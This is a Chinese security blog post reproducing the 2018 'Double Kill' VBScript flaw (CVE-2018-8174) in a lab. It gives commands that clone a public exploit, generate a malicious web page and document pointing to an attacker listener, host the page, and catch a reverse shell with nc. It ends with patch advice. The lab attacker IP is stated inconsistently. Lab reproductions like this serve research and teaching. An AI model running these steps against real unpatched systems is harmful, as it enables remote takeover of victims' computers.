freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

CVE20188174-双杀0day漏洞复现
2019-01-10 15:04:27

漏洞描述:

CVE-2018-8174是Windows VBScriptEngine 代码执行漏洞,由于 VBScript 脚本执行引擎(vbscript.dll)存在该漏洞,攻击者可以将恶意的VBScript嵌入到Office文件或者网站中,一旦用户受诱导或不慎点击恶意链接或文档,攻击者便可远程获取当前用户系统权限,进而完全控制用户电脑。

2018年4月18日国内某信息安全公司监控到一例使用该漏洞的攻击活动后,当天与微软公司沟通,将相关信息提交到微软。微软在4月20日确认此漏洞,于5月8号发布了官方安全补丁对其进行修复,并将其命名为 CVE-2018-8174,在国内该漏洞则被称为“双杀”漏洞。

复现过程

攻击机:Linuxkali    ip:192.168.1.117

靶机:Windows7专业版    ip:192.168.1.118

注:本次由于靶机环境限制,仅以网站点击恶意链接获取权限方法验证该漏洞


首先从github下载项目:

#git clone https://github.com/Sch01ar/CVE-2018-8174_EXP

图片.png

生成带有恶意VBscript的html页面和word文档

#pythonCVE-2018-8174.py -u http://192.168.220.117/exploit.html -o msf.rtf -i192.168.220.117 -p 4444图片.png

其中:-u指定URL 地址,-o指定生成文档,-i指定监听地址,-p指定监听端口

注:生成之前需进入到项目文件夹下,否则提示找不到文件

 生成后ls查看当前目录下的文件,确保所需要的文件完整

图片.png将explot.html复制到/var/www/html路径下,并开启apache服务

图片.pngnc指令,用于监听4444端口图片.png

开始监听后,我们用靶机,也就是windows7浏览器打开攻击机生成的恶意链接:192.168.1.117/exploit.html图片.png

虽然网页报错,但可以 发现攻击机已经拿到靶机的系统权限图片.png

修复建议

此漏洞已在2018年5月8日被微软官方修复,win10不受此漏洞影响,win10以下版本安装过该补丁后不受此漏洞影响。

# 0Day漏洞
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者